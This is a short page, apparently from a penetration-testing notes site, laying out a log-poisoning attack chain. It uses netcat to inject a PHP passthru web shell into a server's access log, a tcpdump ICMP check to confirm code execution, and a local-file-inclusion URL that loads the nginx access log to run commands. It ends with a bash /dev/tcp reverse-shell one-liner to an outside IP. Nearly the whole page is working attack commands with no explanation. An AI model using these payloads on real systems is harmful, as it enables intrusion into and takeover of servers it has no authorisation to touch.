Log Poisoning

Log Poisoning

code 

nc -nv $IP 80
GET /<?php passthru($_GET['offsec']); ?>

example

Test RCE

code 

tcpdump -i any "icmp"

example

code

http://192.168.1.165/thankyou.php?file=/var/log/nginx/access.log&offsec=ping%20-c%203%20192.168.1.7

example

Reverse Shell

code

bash -c 'bash -i >& /dev/tcp/192.168.1.7/443 0>&1'

  • to url encode

example

PreviousWeb ProxiesNextdotdotpwn

Last updated